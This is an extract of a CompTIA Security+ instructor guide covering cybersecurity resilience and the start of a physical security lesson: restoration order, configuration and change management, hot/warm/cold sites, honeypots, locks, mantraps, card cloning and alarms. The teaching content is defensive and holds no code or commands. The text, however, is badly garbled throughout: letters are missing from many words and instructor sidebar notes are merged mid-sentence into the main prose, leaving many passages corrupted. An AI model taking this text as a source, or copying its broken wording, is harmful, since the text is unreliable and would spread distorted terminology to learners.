order of restoration. If systems are brought back online in an uncontrolled way, there make a good
is the serious risk of causing additional power problems or of causing problems in the e ample of why
order of restoration
network, , or application layers because dependencies between di erent appliances is a critical topic
and servers have not been met. computerweekly.com
news
In very general terms, the order of restoration will be as follows
The ritish Airways
1. nable and test power delivery systems grid power, power distribution units IT outage hat
D s, , secondary generators, and so on . went wrong with its
datacentre .
2. nable and test switch infrastructure, then routing appliances and systems.

3. nable and test network security appliances firewalls, ID , pro ies .

4. nable and test critical network servers D C , DN , NT , and directory services .

5. nable and test back end and middleware databases and business logic . erify
data integrity.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 528 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

6. nable and test front end applications.

7. nable client workstations and devices and client browser access.

Show Slide(s) onpersistence

Nonpersistence
hen recovering systems, it may be necessary to ensure that any artifacts from
the disaster, such as malware or backdoors, are removed when reconstituting the
production environment. This can be facilitated in an environment designed for
nonpersistence. Nonpersistence means that any given instance is completely static
in terms of processing function. Data is separated from the instance so that it can be
swapped out for an as new copy without su ering any configuration problems. There
are various mechanisms for ensuring nonpersistence
• napshot revert to known state this is a saved system state that can be reapplied
to the instance.

• ollback to known configuration a physical instance might not support snapshots

but has an internal mechanism for restoring the baseline system configuration,
such as indows ystem estore.

• Live boot media another option is to use an instance that boots from read only
storage to memory rather than being installed on a local read write hard disk.

hen provisioning a new or replacement instance automatically, the automation

system may use one of two types of mastering instructions
• Master image this is the gold copy of a server instance, with the , applications,
and patches all installed and configured. This is faster than using a template, but
keeping the image up to date can involve more work than updating a template.

• Automated build from a template similar to a master image, this is the build
instructions for an instance. ather than storing a master image, the software may
build and provision an instance according to the template instructions.

Another important process in automating resiliency strategies is to provide

configuration validation. This process ensures that a recovery solution is working
at each layer hardware, network connectivity, data replication, and application . An
automation solution for incident and disaster recovery will have a dashboard of key
indicators and may be able to evaluate metrics such as compliance with and T
from observed data.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 529

Review Activity:
Backup Strategies
Answer the following uestions

1. What type of scheduled Windows backup job does not clear the archive
attribute?

A di erential backup. This type of backup selects all new and modified data since the
previous full backup. ou could also mention copy backups, though these are usually
ad hoc rather than scheduled.

2. How does VSS assist a backup solution?

The volume shadow copy service creates snapshots for the backup software to use,
avoiding problems with file locks and uncompleted database transactions.

3. True or alse ac up media can e onsite ut o ine

True. As a security precaution, backup media can be taken o ine at the completion of
a ob to mitigate the risk of malware corrupting the backup.

4. You are advising a company about backup requirements for a few dozen
application servers hosting tens of terabytes of data. The company requires
online a aila ilit o short term ac ups plus o site securit media and
long-term archive storage. The company cannot use a cloud solution. What
type of on-premises storage solution is best suited to the requirement?

The o site and archive re uirements are best met by a tape solution, but the online
re uirement may need a AID array, depending on speed. The re uirement is probably
not large enough to demand a storage area network AN , but could be provisioned as
part of one.

5. What is the risk of not following a tested order of restoration when

recovering a site from a major incident?

There may be unmet dependencies between systems that are started in the wrong
order. This could lead to boot failures and possibly data corruption.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 530 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 20C
Implement Cybersecurity
Resiliency Strategies

Teaching EXAM OBJECTIVES COVERED

Tip 2.1 Explain the importance of security concepts in an enterprise environment
This topic completes 2.5 Given a scenario, implement cybersecurity resilience
ob ective . by 5.3 Explain the importance of policies to organizational security
covering the diversity
content e amples, ective site management and cybersecurity resilience depend on change control and
but we also look at configuration management. If this crucial documentation is not kept up to date, the
configuration and
change management,
response to incident and disaster events will su er from confusion, errors, and lost time.
site resiliency, and As part of a cybersecurity program, you must also be able to implement techni ues
deception strategies
that make things difficult for threat actors. Defense in depth and control diversity are
from ob ectives .
and . . crucial in designing resilient systems. Deception and disruption tactics help to increase
the cost of attacks and so deter them.

Show Slide(s) Confi uration ana ement

Configuration
esponse and recovery controls refer to the whole set of policies, procedures, and
Management resources created for incident and disaster response and recovery. These controls are
critical to cybersecurity, but they become increasingly difficult to provision at scale.
Teaching ective response and recovery depend heavily on how well organi ed IT systems
Tip are at the site level. ithout e ective organi ational policies to govern change and
ou don't need to configuration management, response and recovery is much harder.
cover this in detail
ust stress that Confi uration mana ement ensures that each component of ICT infrastructure is in
the attributes and a trusted state that has not diverged from its documented properties. Change control
relationships of assets and change management reduce the risk that changes to these components could
supporting a work ow cause service disruption.
must be documented.
ITIL is a popular documentation of good and best practice activities and processes
for delivering IT services. nder ITIL, configuration management is implemented using
the following elements
• ervice assets are things, processes, or people that contribute to the delivery of an
IT service.

• A Configuration Item CI is an asset that re uires specific management procedures

for it to be used to deliver the service. ach CI must be identified by some sort of
label, ideally using a standard naming convention. CIs are defined by their attributes
and relationships, which are stored in a configuration management database
CMD .

• A aseline confi uration is the template of settings that a device, M instance, or

other CI was configured to, and that it should continue to match. ou might also
record performance baselines, such as the throughput achieved by a server, for
comparison with monitored levels.

• A configuration management system CM is the tools and databases that collect,

store, manage, update, and present information about CIs and their relationships.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 531

A small network might capture this information in spreadsheets and diagrams

there are dedicated applications for enterprise CM .

• Diagrams are the best way to capture the comple relationships between network
elements. Diagrams can be used to show how CIs are involved in business
work ows, logical I and physical network topologies, and network rack layouts.
emember, it is not sufficient simply to create the diagram, you must also keep the
diagram up to date.

Asset Management Show Slide(s)

An asset management process tracks all the organi ation's critical systems, Asset Management
components, devices, and other ob ects of value in an inventory. It also involves
collecting and analy ing information about these assets so that personnel can make Interaction
more informed changes or otherwise work with assets to achieve business goals. Opportunity

There are many software suites and associated hardware solutions available for If you do have some
e tra time, ask
tracking and managing assets. An asset management database can be configured to students what naming
store as much or as little information as is deemed necessary, though typical data conventions they have
would be type, model, serial number, asset ID, location, user s , value, and service encountered. Note
information. the past propensity
to use arbitrary, but
colorful, server names.
e are focusing on assets that re uire some degree of configuration (CIs). An organization
ome schemes code
will also have many assets with no configuration re uirement, such as furniture.
location attributes,
but they are less
relevant to the cloud.
unctional names can
Asset Identification and tandard amin Con entions be tricky if devices
subse uently change
Tangible assets can be identified using a barcode label or radio fre uency ID ID tag function. ne school
attached to the device or more simply, using an identification number . An ID tag is of thought is that a
single convention that
a chip programmed with asset data. hen in range of a scanner, the chip activates and tries to code multiple
signals the scanner. The scanner alerts management software to update the device's fields within a single
location. As well as asset tracking, this allows the management software to track the string that will remain
location of the device, making theft more difficult. consistent over time
is an impossible goal,
A standard naming convention for hardware assets, and for digital assets such as so the ID should
accounts and virtual machines, makes the environment more consistent. This means ust be an arbitrary
that errors are easier to spot and that it is easier to automate through scripting. The string, colorful or not,
naming strategy should allow administrators to identify the type and function of any and devices located
and selected via
particular resource or location at any point in the CMD or network directory. ach attributes and tags,
label should conform to rules for host and DN names support.microsoft.com en us possibly using CNAM
help naming conventions in active directory for computers domains sites and T T records
and . As well as an ID attribute, the location and function of tangible and digital assets watson wilson.ca
can be recorded using attribute tags and fields or DN CNAM and T T resource blog host
naming .
records.

Internet Protocol (IP) Schema

The division of the I address space into subnets should be carefully planned and
documented in an Internet rotocol I schema. sing a consistent addressing
methodology makes it easier to apply firewall access control lists ACLs and perform
security monitoring tools.cisco.com security center resources security ip addressing.
html . It also makes configuration errors less likely and easier to detect. ithin
each subnet, the schema should identify I addresses reserved for manual or static
allocation versus D C address pools. IP address management (IPAM) software
suites can be used to monitor I usage.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 532 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Chan e Control and Chan e ana ement

Change Control and
ervice management standards distinguish change control as distinct procedures for
Change Management re uesting and approving changes within an overall change management process.

Change Control
A change control process can be used to re uest and approve changes in a planned
and controlled way. Change re uests are usually generated when something needs
to be corrected, when something changes, or when there is room for improvement in
a process or system currently in place. The need to change is often described either
as reactive, where the change is forced on the organi ation, or as proactive, where
the need for change is initiated internally. Changes can also be categori ed according
to their potential impact and level of risk ma or, significant, minor, or normal, for
instance . In a formal change management process, the need or reasons for change
and the procedure for implementing the change is captured in a re uest for change
C document and submitted for approval.
The C will then be considered at the appropriate level and a ected stakeholders will
be notified. This might be a supervisor or department manager if the change is normal
or minor. Ma or or significant changes might be managed as a separate pro ect and
re uire approval through a change advisory board CA .

Change Management
The implementation of changes should be carefully planned, with consideration for
how the change will a ect dependent components. or most significant or ma or
changes, organi ations should attempt to trial the change first. very change should be
accompanied by a rollback or remediation plan, so that the change can be reversed
if it has harmful or unforeseen conse uences. Changes should also be scheduled
sensitively if they are likely to cause system downtime or other negative impact on
the work ow of the business units that depend on the IT system being modified. Most
networks have a scheduled maintenance window period for authori ed downtime.
hen the change has been implemented, its impact should be assessed, and the
process reviewed and documented to identify any outcomes that could help future
change management pro ects.

Show Slide(s) ite esilienc

ite esiliency
nterprise level networks often provision resiliency at the site level. An alternate
processing or recovery site is a location that can provide the same or similar level
Teaching of service. An alternate processing site might always be available and in use, while a
Tip recovery site might take longer to set up or only be used in an emergency.
ou might want perations are designed to failover to the new site until the previous site can be
to note hot hot
terminology to
brought back online. ailover is a techni ue that ensures a redundant component,
distinguish the site device, application, or site can uickly and efficiently take over the functionality of an
and replication asset that has failed. or e ample, load balancers provide failover in the event that
method. ot hot one or more servers or sites behind the load balancer are down or are taking too long
refers to synchronous to respond. nce the load balancer detects this, it will redirect inbound traffic to an
replication between
alternate processing server or site. Thus, redundant servers in the load balancer pool
the live site and the
failover, so that there ensure there is no or minimal interruption of service.
is no delay. ot cold ite resiliency is described as hot, warm, or cold
refers to a processing
facility that is fully • A hot site can failover almost immediately. It generally means that the site is
operational, but where already within the organi ation's ownership and is ready to deploy. or e ample,
data must be restored
a hot site could consist of a building with operational computer e uipment that is
manually from a
backup. kept updated with a live data set.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 533

• A warm site could be similar, but with the re uirement that the latest data set will
need to be loaded.

• A cold site takes longer to set up. A cold site may be an empty building with a lease
agreement in place to install whatever e uipment is re uired when necessary.

Clearly, providing redundancy on this scale can be very e pensive. ites are often
leased from service providers. owever, in the event of a nationwide emergency,
demand for the services is likely to e ceed supply Another option is for businesses to
enter into reciprocal arrangements to provide mutual support. This is cost e ective but
comple to plan and set up.
Another issue is that creating a duplicate of anything doubles the comple ity of
securing that resource properly. The same security procedures must apply to
redundant sites, spare systems, and backup data as apply to the main copy.
or many companies, the most cost e ective solution is to move processing and data
storage to the cloud.

Diversity and Defense in Depth Show Slide(s)

Layered security is typically seen as improving cybersecurity resiliency because Diversity and Defense
it provides defense in depth. The idea is that to fully compromise a system, the in Depth
attacker must get past multiple security controls, providing control diversity. These
layers reduce the potential attack surface and make it much more likely that an attack
will be deterred or prevented, or at least detected and then prevented by manual
intervention.

Technology and Control Diversity

Allied with defense in depth is the concept of security through or with diversity.
Technology diversity refers to environments that are a mi of operating systems,
applications, coding languages, virtuali ation solutions, and so on. Control diversity
means that the layers of controls should combine di erent classes of technical and
administrative controls with the range of control functions prevent, detect, correct,
and deter.
Consider the scenario where Alan from marketing is sent a stick containing
designs for a new billboard campaign from an agency. ithout defense in depth, Alan
might find the stick on his desk in the morning, plug it into his laptop without
much thought, and from that point is potentially vulnerable to compromise. There are
many opportunities in this scenario for an attacker to tamper with the media at the
agency, in the post, or at Alan's desk.
Defense in depth, established by deploying a diverse range of security controls, could
mitigate the numerous risks inherent in this scenario
• ser training administrative control could ensure that the media is not left
unattended on a desk and is not inserted into a computer system without scanning
it first.

• ndpoint security technical control on the laptop could scan the media for
malware or block access automatically.

• ecurity locks inserted into ports physical control on the laptop could prevent
attachment of media without re uesting a key, allowing authori ation checks to be
performed first.

• ermissions restricting Alan's user account technical control could prevent the
malware from e ecuting successfully.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 534 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• The use of encrypted and digitally signed media technical control could prevent or
identify an attempt to tamper with it.

• If the laptop were compromised, intrusion detection and logging alerting systems
technical control could detect and prevent the malware spreading on the network.

Vendor Diversity
As well as deploying multiple types of controls, you should consider the advantages
of leveraging vendor diversity. endor diversity means that security controls are
sourced from multiple suppliers. A single vendor solution is a tempting choice for many
organi ations, as it provides interoperability and can reduce training and support costs.
ome disadvantages could include the following
• Not obtaining best in class performance one vendor might provide an e ective
firewall solution, but the bundled malware scanning is found to be less e ective.

• Less comple attack surface a single vulnerability in a supplier's code could put
multiple appliances at risk in a single vendor solution. A threat actor will be able to
identify controls and possible weaknesses more easily.

• Less innovation dependence on a single vendor might make the organi ation
invest too much trust in that vendor's solutions and less willing to research and test
new approaches.

Crypto Diversity
This concept can be e tended to the selection of algorithms and implementations
of cryptography. Adoption of methods such as blockchain based IAM ibm.com
blogs blockchain decentrali ed identity an alternative to password based
authentication or selecting ChaCha in place of A as a preferred cipher suite
blog.cloud are.com it takes two to chacha poly forces threat actors to develop
new attack methods.

Show Slide(s) Deception and Disruption Strategies

Deception and
The practice of cybersecurity is often described as asymmetric warfare the defenders
Disruption trategies have to win every encounter and be ready all the time. The threat actors can choose
when to attack and only have to win once. ome cybersecurity tactics aim to reduce
that asymmetry by increasing the attack cost. This means that a threat actor has to
commit more resources to even plan an attack.
Active defense means an engagement with the adversary, but this can be interpreted
in several di erent ways. ne type of active defense involves the deployment of decoy
assets to act as lures or bait. It is much easier to detect intrusions when an attacker
interacts with a decoy resource, because you can precisely control baseline traffic and
normal behavior in a way that is more difficult to do for production assets.

one pots one nets and one files

A honeypot is a computer system set up to attract threat actors, with the intention
of analy ing attack strategies and tools, to provide early warnings of attack attempts,
or possibly as a decoy to divert attention from actual computer systems. Another use
is to detect internal fraud, snooping, and malpractice. A honeynet is an entire decoy
network. This may be set up as an actual network or simulated using an emulator.
Deploying a honeypot or honeynet can help an organi ation to improve its security
systems, but there is the risk that the attacker can still learn a great deal about
how the network is configured and protected from analy ing the honeypot system.
Many honeypots are set up by security researchers investigating malware threats,

Lesson 20: Implementing Cybersecurity Resilience | Topic 20C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 535

software e ploits, and spammers' abuse of open relay mail systems. These systems
are generally fully e posed to the Internet. n a production network, a honeypot is
more likely to be located in a DM , or on an isolated segment on the private network
if the honeypot is seeking to draw out insider threats . This provides early warning
and evidence of whether an attacker has been able to penetrate to a given security
one. This can help the security team find the source of the attack and take more
comprehensive steps to completely eradicate the threat from the organi ation.
A honeypot or honeynet can be combined with the concept of a honeyfile, which is
convincingly useful, but actually fake, data. This honeyfile can be made trackable, so
that when a threat actor successfully e filtrates it, the attempts to resuse or e ploit it
can be traced.
or e ample, an organi ation constructs a database full of benign or meaningless
data disguised as important financial records. This deception strategy might involve
breadcrumbs inserted into the production environment to subtly guide a threat actor
toward the spoofed loot fidelissecurity.com threatgeek deception breadcrumbs
intelligent deception . The database is placed behind a subnet with lowered defenses,
which baits an attacker into trying to e filtrate this useless data. Identifying the attacker
also allows an organi ation to pursue an attribution strategy. Attribution means the
organi ation publici es the attacker's role and publishes the methods used as threat
intelligence.

Disruption Strategies
Another type of active defense uses disruption strategies. These adopt some of the
obfuscation strategies used by malicious actors. The aim is to raise the attack cost and
tie up the adversary's resources. ome e amples of disruption strategies include
• sing bogus DN entries to list multiple hosts that do not e ist.

• Configuring a web server with multiple decoy directories or dynamically generated

pages to slow down scanning.

• sing port triggering or spoofing to return fake telemetry data when a host detects
port scanning activity. This will result in multiple ports being falsely reported as
open and will slow down the scan. Telemetry can refer to any type of measurement
or data returned by remote scanning. imilar fake telemetry could be used to report
I addresses as up when they are not, for instance.

• sing a DNS sinkhole to route suspect traffic to a di erent network, such as a

honeynet, where it can be analy ed.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 536 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Cybersecurity Resiliency Strategies
Answer the following uestions

1. ou are preparin a hite paper on confi uration mana ement essentials

for your customers. You have the following headings already: Diagrams,
Standard naming conventions, Internet protocol (IP) schema. If you are
basing your paper on the ComptTIA Security+ objectives, which other topic
should you cover?

The configuration baseline is an essential concept as it allows unauthori ed change to

be detected more easily and planned change to be managed more easily.

2. What are the risks of not having a documented IP schema?

Configuration errors are more likely, especially where comple access control lists
ACLs and security monitoring sensor deployment is re uired.

3. In organizational policies, what two concepts govern change?

A change control process governs the way changes are re uested and approved. A
change management process governs the way that planned change is implemented
and the way unplanned change is handled.

4. Which terms are used to discuss levels of site resiliency?

ot, warm, and cold sites, referring to the speed with which a site can failover.

5. ou are preparin some riefin notes on di ersit strate ies or

cybersecurity resilience for the executive team. You have prepared sections
on Technologies, Crypto, and Controls so far. What other topic do you need
to cover?

endor diversity.

6. How could a deception-based cybersecurity resilience strategy return fake

telemetry to a threat actor?

ake telemetry means that when a threat actor runs port or host discovery scans, a
spoof response is returned. This could lead the threat actor to waste time probing the
port or host I address trying to develop an attack vector that does not actually e ist.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 537

Lesson 20
Summary
ou should be able to use redundancy, backup, configuration change management, Teaching
diversity, and deception to improve cybersecurity resilience. Tip
Check that students
Guidelines for Implementing Cybersecurity Resilience are confident about
the content that has
ollow these guidelines for implementing cybersecurity resilience been covered. If there
is time, revisit any
• et up a configuration management system and ensure that it is kept up to date content e amples that
they have uestions
• An inventory to track assets, using standard naming convention and labelling. about. If you have
used all the available
• aseline configuration information for each configuration item. time for this lesson
block, note the issues,
• Diagrams showing relationships between assets in work ows and networks. and schedule time for
a review later in the
• nsure that changes to work ows and assets are governed by change control and course.
change management processes.
Interaction
• Develop a backup strategy and ensure that the order of restoration is fully tested Opportunity
ptionally, ask
• Determine and recovery windows for di erent data assets. students whether they
have witnessed any
• eparate data from compute functions to ensure nonpersistence during recovery. restore from backup
events that went
• elect media that meets storage and onsite o site plus online o ine storage either disastrously or
re uirements disk, tape, NA , and AN . very well.

• Implement a full incremental di erential scheme to accommodate media

storage limitations.

• sing risk assessments, identify assets that have high availability re uirements and
provision redundancy to meet this re uirement

• ot, warm, or cold site resource to recover from disasters.

• Dual power supply, D s, s, and generators to make power system resilient.

• NIC teaming, multiple paths, and load balancing to make networks resilient.

• AID and multipath I to make storage resilient.

• se risk assessments and impact analysis to identify whether technology, control,

vendor, or crypto diversity could be increased to benefit resiliency.

• se threat awareness and risk assessment to determine whether deception and

active defense strategies, such as decoy honeypot assets and fake telemetry, could
benefit resiliency.

Lesson 20: Implementing Cybersecurity Resilience

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 21
Explaining Physical Security

LESSON INTRODUCTION Teaching

Tip
isks from intrusion by social engineering, wireless backdoors, and data e filtration by As well as site
mobile devices all mean that physical security is a critical consideration for site design perimeter security,
and operations. The premises in which networks are installed need to use access this topic looks
control mechanisms and be resilient to person-made and natural disasters, such at the security of
as fire. hardware cabling
and environmental
monitoring. This
Lesson Objectives material should be
quite straightforward
In this lesson, you will: and you should
hopefully not need to
• Explain the importance of physical site security controls. allocate too much class
time to covering it.
• Explain the importance of physical host security controls.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 540 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 21A
Explain the Importance of Physical
Site Security ontrols

Teaching EXAM OBJECTIVES COVERED

Tip 1.2 Given a scenario, analyze potential indicators to determine the type of attack
As well as starting 2.7 Explain the importance of physical security controls
coverage of objective
2.7, this topic includes
card cloning and
If an attacker can gain physical access to your premises, there may be lots of
skimming attacks opportunities to install rogue devices, vandalize or disrupt systems, or observe
from . . confidential information. Conse uently, as a security professional, you should be able
to explain the importance of installing access and monitoring controls that protect sites
against physical intrusion.

Show Slide(s) Physical Security Controls

Physical Security
Physical access controls are security measures that restrict and monitor access to
Controls specific physical areas or assets. They can control access to a building, to e uipment,
or to specific areas, such as server rooms, finance or legal areas, data centers, network
Teaching cable runs, or any other area that has hardware or information that is considered
Tip to have important value and sensitivity. Determining where to use physical access
Recall that deterrence, controls re uires a cost benefit analysis and must consider any regulations or other
delay, and detection compliance re uirements for the specific types of data that are being safeguarded.
are often more
realistic security goals Physical access controls depend on the same access control fundamentals as network
than prevention. or operating system security:
• Authentication create access lists and identification mechanisms to allow
approved persons through the barriers.

• Authorization—create barriers around a resource so that access can be controlled

through defined entry and e it points.

• Accounting—keep a record of when entry/exit points are used and detect security
breaches.
Show Slide(s)
Physical security can be thought of in terms of zones. Each zone should be separated
Site Layout, Fencing, by its own barrier(s). Entry and exit points through the barriers need to be controlled
and Lighting by one or more security mechanisms. Progression through each zone should be
progressively more restricted.
Teaching
Tip
Make sure students
Site Layout, Fencing, and Lighting
are familiar with
the di erent
In e isting premises, there will not be much scope to in uence site layout. owever,
types of physical given constraints of cost and existing infrastructure, try to plan the site using the
access controls— following principles:
barriers, gateways,
locks, alarms, and • Locate secure zones, such as equipment rooms, as deep within the building as
surveillance. possible, avoiding external walls, doors, and windows.

Lesson 21: Explaining Physical Security | Topic 21A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 541

• Use a demilitarized zone (DMZ) design for the physical space. Position public access
areas so that guests do not pass near secure zones. Security mechanisms in public
areas should be highly visible, to increase deterrence.

• Use signage and warnings to enforce the idea that security is tightly controlled.
eyond basic no trespassing signs, some homes and offices also display signs from
the security companies whose services they are currently using. These may convince
intruders to stay away.

• Conversely, entry points to secure ones should be discreet. Do not allow an

intruder the opportunity to inspect security mechanisms protecting such zones (or
even to know where they are). Use industrial camou a e to make buildings and
gateways protecting high-value assets unobtrusive, or create high-visibility decoy
areas to draw out potential threat actors.

• Try to minimi e traffic having to pass between ones. The ow of people should be
"in and out" rather than "across and between."

• ive high traffic public areas high visibility, so that covert use of gateways, network
access ports, and computer e uipment is hindered, and surveillance is simplified.

• In secure zones, do not position display screens or input devices facing toward
pathways or windows. Alternatively, use one-way glass so that no one can look in
through windows.

Barricades and Entry/Exit Points

A barricade is something that prevents access. As with any security system, no
barricade is completely e ective a wall may be climbed or a lock may be picked, for
instance. The purpose of barricades is to channel people through defined entry and
exit points. Each entry point should have an authentication mechanism so that only
authori ed persons are allowed through. ective surveillance mechanisms ensure
that attempts to penetrate a barricade by other means are detected.

Sites where there is a risk of a terrorist attack will use barricades such as bollards and
security posts to prevent vehicles from approaching closely to a building at high speed.

Fencing
The exterior of a building may be protected by fencing. Security fencing needs to be
transparent (so that guards can see any attempt to penetrate it), robust (so that it is
difficult to cut , and secure against climbing which is generally achieved by making it tall
and possibly by using ra or wire . encing is generally e ective, but the drawback is that
it gives a building an intimidating appearance. Buildings that are used by companies to
welcome customers or the public may use more discreet security methods.

Lighting
Security lighting is enormously important in contributing to the perception that a
building is safe and secure at night. Well-designed lighting helps to make people feel
safe, especially in public areas or enclosed spaces, such as parking garages. Security
lighting also acts as a deterrent by making intrusion more difficult and surveillance
(whether by camera or guard) easier. The lighting design needs to account for overall
light levels, the lighting of particular surfaces or areas (allowing cameras to perform
facial recognition, for instance), and avoiding areas of shadow and glare.

Lesson 21: Explaining Physical Security | Topic 21A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 542 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) ate a s and oc s

ateways and Locks
In order to secure a gateway, it must be fitted with a lock. A secure gateway will
normally be self-closing and self-locking, rather than depending on the user to close
and lock it. Lock types can be categorized as follows:
• Physical—a conventional lock prevents the door handle from being operated
without the use of a key. More e pensive types o er greater resistance against lock
picking.

• Electronic—rather than a key, the lock is operated by entering a PIN on an electronic

keypad. This type of lock is also referred to as cipher, combination, or keyless. A
smart lock may be opened using a magnetic swipe card or feature a proximity
reader to detect the presence of a physical token, such as a wireless key fob or
smart card.

Generic examples of locks—From left to right, a standard key lock, a deadbolt lock, and an electronic
keypad lock. (Images from user macrovector 1 .com.)

• iometric a lock may be integrated with a biometric scanner.

Generic examples of a biometric thumbprint scanner lock and a token-based key card lock.
(Images from user macrovector 1 .com.)

Lesson 21: Explaining Physical Security | Topic 21A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 543

Mantraps
Apart from being vulnerable to lock picking, the main problem with a simple door or
gate as an entry mechanism is that it cannot accurately record who has entered or left
an area. Multiple people may pass through the gateway at the same time a user may
hold a door open for the ne t person an unauthori ed user may tailgate behind an
authorized user. This risk may be mitigated by installing a turnstile (a type of gateway
that only allows one person through at a time). The other option is to add some sort of
surveillance on the gateway. Where security is critical and cost is no object, an access
control vestibule, or mantrap, could be employed. A mantrap is where one gateway
leads to an enclosed space protected by another barrier.

Cable Locks
Cable locks attach to a secure point on the device chassis. A server chassis might come
with both a metal loop and a Kensington security slot. As well as securing the chassis
to a rack or desk, the position of the secure point prevents the chassis from being
opened, without removing the cable first.

Physical Attacks against Smart Cards and USB Show Slide(s)

Some types of smart cards used as passkeys for electronic locks can be vulnerable to Physical Attacks
cloning and skimming attacks: against mart Cards
and USB
• Card cloning—this refers to making one or more copies of an existing card. A
lost or stolen card with no cryptographic protections can be physically duplicated.
Card loss should be reported immediately so that it can be revoked and a new one
issued. If there were a successful attack, it might be indicated by use of a card in a
suspicious location or time of day.

• Skimming—this refers to using a counterfeit card reader to capture card details,

which are then used to program a duplicate. Some types of proximity card can quite
easily be made to transmit the credential to a portable RFID reader that a threat
actor could conceal on his or her person. Skimmers installed on public readers, such
as ATM machines, can be difficult to spot.

These attacks can generally only target "dumb" smart cards that transfer tokens rather
than perform cryptoprocessing. Bank-issued smart cards, referred to as EMV (Electron,
MasterCard, isa , can also be vulnerable through the magnetic strip, which is retained
for compatibility.

When evaluating risks from card cloning and skimming, you need to realize that there are
many types of smart card. or example, old I A E Classic cards used as public transit
payment cards are easily cloned because they use a weak cryptographic implementation.
Building entry systems using contactless cards with no cryptoprocessing are also vulnerable
(youtube.com watch v cxxnuof Ec ). Cloning of I A E E or E smart cards that
implement a TPM-like cryptoprocessor is not thought to be possible.

Malicious USB charging cables and plugs are also a widespread problem. As with card
skimming, a device may be placed over a public charging port at airports and other
transit locations. A USB data blocker can provide mitigation against these juice-
jacking attacks by preventing any sort of data transfer when the smartphone or laptop
is connected to a charge point (zdnet.com/article/this-cheap-gadget-can-stop-your-
smartphone-or-tablet-being-hacked-at-an-airport-hotel-or-cafe).

Alarm Systems and Sensors Show Slide(s)

When designing premises security, you must consider the security of entry points that Alarm Systems and
could be misused, such as emergency exits, windows, hatches, grilles, and so on. These Sensors

Lesson 21: Explaining Physical Security | Topic 21A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 544 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

may be fitted with bars, locks, or alarms to prevent intrusion. Also consider pathways
above and below, such as false ceilings and ducting. There are five main types of alarm
• Circuit a circuit based alarm sounds when the circuit is opened or closed,
depending on the type of alarm. This could be caused by a door or window opening
or by a fence being cut. A closed-circuit alarm is more secure because an open
circuit alarm can be defeated by cutting the circuit.

• Motion detection—a motion-based alarm is linked to a detector triggered by any

movement within an area defined by the sensitivity and range of the detector , such
as a room. The sensors in these detectors are either microwave radio re ection
(similar to radar) or passive infrared (PIR), which detect moving heat sources.

• Noise detection—an alarm triggered by sounds picked up by a microphone. Modern

AI backed analysis and identification of specific types of sound can render this type
of system much less prone to false positives.

• Proximity—radio frequency ID (RFID) tags and readers can be used to track the
movement of tagged objects within an area. This can form the basis of an alarm
system to detect whether someone is trying to remove equipment.

• Duress this type of alarm is triggered manually by sta if they come under
threat. There are many ways of implementing this type of alarm, including wireless
pendants, concealed sensors or triggers, and D CT handsets or smartphones. ome
electronic entry locks can also be programmed with a duress code that is di erent
from the ordinary access code. This will open the gateway but also alert security
personnel that the lock has been operated under duress.

Circuit based alarms are typically suited for use at the perimeter and on windows
and doors. These may register when a gateway is opened without using the lock
mechanism properly or when a gateway is held open for longer than a defined period.
Motion detectors are useful for controlling access to spaces that are not normally
used. Duress alarms are useful for e posed sta in public areas. An alarm might simply
sound an alert or it may be linked to a monitoring system. Many alarms are linked
directly to local law enforcement or to third-party security companies. A silent alarm
alerts security personnel rather than sounding an audible alarm.

Show Slide(s) Security Guards and Cameras

Security Guards and
Surveillance is typically a second layer of security designed to improve the resilience of
Cameras perimeter gateways. Surveillance may be focused on perimeter areas or within security
ones themselves. uman security guards, armed or unarmed, can be placed in front
